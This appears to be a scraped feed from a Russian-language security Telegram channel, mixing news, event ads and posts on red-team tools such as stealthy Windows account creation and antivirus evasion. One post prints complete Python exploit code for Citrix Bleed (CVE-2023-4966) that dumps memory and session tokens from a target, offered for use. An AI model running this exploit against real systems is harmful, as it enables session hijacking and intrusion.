Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
⚡️ Создаём "невидимые" аккаунты на Windows с помощью Suborner
#windows #redteam

Главные функции:
1️⃣ Создавайте невидимые локальные учетные записи без использования команды net user или user management приложений Windows (например, netapi32::netuseradd).

2️⃣ Подходит для всех машин Windows NT (от Windows XP до 11, от Windows Server 2003 до 2022).

3️⃣ Осуществляйте подмену идентификатора путем использования техники RID Hijacking для любой существующей учетной записи (активной или отключенной) после успешной аутентификации.

4️⃣ Создавайте невидимую учетную запись компьютера с административными привилегиями, обходя Event Logger Windows, который фиксирует создание учетной записи!

💻 Github repo

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16🆒21
Love Pentest is...
👍2312💘8🆒2❤‍🔥1
Forwarded from Standoff 365
🔎 Хотите тоже оказаться в поисковой выдаче Яндекса по запросу «багбаунти»?

Есть простой способ: выступите 24–25 ноября на митапе Standoff Talks, где соберутся элита российского багбаунти и легенды практической безопасности.

🔥 Специально для вас мы решили увеличить количество выступлений и по этому поводу продлеваем call for papers до 27 октября.

Ждем докладов о пентесте и red team, багбаунти, участии в Standoff, онлайн-киберучениях, OSINT или на любую другую интересную тему в сфере практической кибербезопасности.

Все подробности и форма подачи заявки — здесь: https://cfp.standoff365.com/talks/cfp
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉71🌚1
Forwarded from Код Дурова
👋 Вот это хорошо //

В бета-версии 4.10.4 Beta приложения Telegram Desktop у администраторов появилась возможность работать со статистикой каналов и групп.

Добавлены и другие важные нововведения:

— Например, можно быстро менять настройки пересылки по нажатию правой кнопки мыши на панель над полем ввода.

— Теперь есть визуально красивые блоки с кодом с подсветкой синтаксиса, их можно копировать по щелчку на заголовки блоков.

— Блок с моноширинным текстом и с подсветкой кода на выбранном языке программирования можно копировать при помощи синтаксиса ```language.

— Сочетание клавиш Ctrl+Space позволяет открывать меню проверки орфографии.

@d_code
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍1
Forwarded from Just Security
Мало кто знает, но в Awillix люди почти не попадают с улицы или «по объявлению», у всех есть история личного знакомства или его интересных обстоятельств. Так, например, Сережа aka @poxek подошел к нам на форуме после выступления с рядом интересных вопросов по теме.
«Такой молодой, а такой прокаченный парень» — подумали мы. Запомнили. А через время позвали в команду.

Его пример другим наука, как с помощью проактивности и упорства нестись по карьерной лестнице, обгоняя сверстников, получать разные бенефиты и полезные знакомства и успевать вести дюжину собственных проектов. Об этом он и дал интервью, спешите вдохновляться!
🔥22❤‍🔥6👍4🥰31🫡1💘1
This media is not supported in your browser
VIEW IN TELEGRAM
🦠 Веселые хеши. Реализуем технику API Hashing, чтобы обдурить антивирус
#AVbypass #xakep

В этой статье мы с тобой напишем пол­ноцен­ную пер­мутиру­ющую реали­зацию тех­ники API Hashing, что поз­волит раз и нав­сегда скрыть импорты от глаз анти­виру­са. Впер­вые тех­нику API Hashing я уви­дел в вирусе‑шиф­роваль­щике Revil, проб­лема лишь в том, что хеши от фун­кций были впи­саны в код, а это поз­воля­ет лег­ко соз­давать сиг­натуры. Давай сде­лаем так, что­бы все дан­ные генери­рова­лись на лету, тог­да у анти­виру­са не будет шан­сов!

➡️ Статья на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍5👀1
This media is not supported in your browser
VIEW IN TELEGRAM
😉 BloodHound. Натаскиваем ищейку на поиск NTLM Relay
#bloodhound #xakep

Преж­де чем при­менять тех­нику NTLM Relay, необ­ходимо соб­рать информа­цию об иссле­дуемом объ­екте и выб­рать пер­вооче­ред­ные цели. Но как это сде­лать, если ата­куемая сеть нас­читыва­ет мно­гие десят­ки или сот­ни узлов? На помощь при­дет очень полез­ный и удоб­ный инс­тру­мент — BloodHound!

➡️ Статья на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥6
Forwarded from Волосатый бублик
#cisco #cve #webshell #scanner #blueteam

[ Cisco IOS XE Device Scanner for CVE-2023-20198 & CVE-2023-20273 ]

Webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273. 

Important! This is not a POC for exploitation. This is a OSINT/Blue Team/Research tool.

Author: Shadow0ps

https://github.com/Shadow0ps/CVE-2023-20198-Scanner
👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Эксплойт для Citrix Bleed: Leaking Session Tokens
CVE-2023-4966

Пользуйтесь на здоровье 😉
Exploit:
#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200)')
sys.exit(0)

hostname = args.target

if __name__ == "__main__":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")


Использование:
python exploit.py --target TARGET

💻 Github

➡️ Исследование

📹 YouTube PoC

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍81
Forwarded from Standoff 365
This media is not supported in your browser
VIEW IN TELEGRAM
🤩 Как попасть на самый прекрасный митап этой осени — Standoff Talks, где лучшие профессионалы offensive и defensive security обменяются опытом с активным комьюнити?

Все просто: нужно быть матерым спецом по ИБ (уверены, в нашем канале только такие) и оставить заявку на сайте.

А 24–25 ноября встретиться в Кибердоме в рамках Moscow Hacking Week, чтобы прокачать свои скилы в багхантинге и пентесте, да и в целом круто провести время.

Не забудьте рассказать о себе в заявке и поторопитесь — количество мест ограничено.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🆒1
Похек
😉 BloodHound. Натаскиваем ищейку на поиск NTLM Relay #bloodhound #xakep Преж­де чем при­менять тех­нику NTLM Relay, необ­ходимо соб­рать информа­цию об иссле­дуемом объ­екте и выб­рать пер­вооче­ред­ные цели. Но как это сде­лать, если ата­куемая сеть нас­читыва­ет…
This media is not supported in your browser
VIEW IN TELEGRAM
🐧 Microsoft отказывается от NTLM в пользу Kerberos

Компания Microsoft анонсировала, что в будущем NTLM (New Technology LAN Manager) будет отключен в Windows 11, поскольку компания переходит на альтернативные методы аутентификации и повышения безопасности. Теперь основной упор будет сделан на усиление протокола Kerberos.

➡️ Новость на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥13
💊 Регистрация на Standoff 101 от Positive Technologies
Мероприятие для тех, кто хочет попасть в кибербез, но не знает, с чего начать

📌 Даты: 18–19 ноября

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍82
😵 Регистрация на Standoff Talks от Positive Technologies
Место для общения и обмена опытом профи и энтузиастов ИБ

📌 Даты: 24-25 ноября

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
This media is not supported in your browser
VIEW IN TELEGRAM
🍏 Эксплойт для CVE-2023-41993
Apple WebKit Arbitrary Code Execution

Затронутые версии: WebKitGTK и WPE WebKit до версии 2.42.1.
Импакт: Обработка веб-контента может привести к выполнению произвольного кода.

⚡️ Ссылка на PoC
Переходите по ссылке, только если вы уверены, что ваше яблочное устройство обновлено до последней версии или у вас Android.

1️⃣ Ссылка на эксплойт с объяснением принципа его эксплуатации

2️⃣ Бекап репозиторий

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
😎92👍2💔2
This media is not supported in your browser
VIEW IN TELEGRAM
Как провести свое первое security-исследование. Колонка Дениса Макрушина

На­чало учеб­ного года — это еще и начало сезона под­готов­ки дип­ломных работ. А это зна­чит, что у меня нас­тупа­ет сезон фор­мулиро­вания тем для сту­ден­тов факуль­тетов и кафедр информа­цион­ной безопас­ности в ведущих вузах. Я соб­рал свои рекомен­дации и лай­фха­ки для под­готов­ки тво­его пер­вого ИБ‑иссле­дова­ния.

От себя добавлю, что материал подойдёт всем, кто планирует или уже делает доклад/исследование на какую-то тему, не обязательно ИБ. В статье говориться про сам подход к ресерчам.
Отмечу сайт cfptime.org , где вы сможете отслеживать мировые конференции по ИБ, на которые вы сможете подавать на CFP (Call Of Papers).
А также ict2go для поиска мероприятий по различным направлениям и формату в России.

➡️ Статья на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
9
Positive Technologies. Разговор об актуальных трендах кибербезопасности

Локация: Музей криптографии
213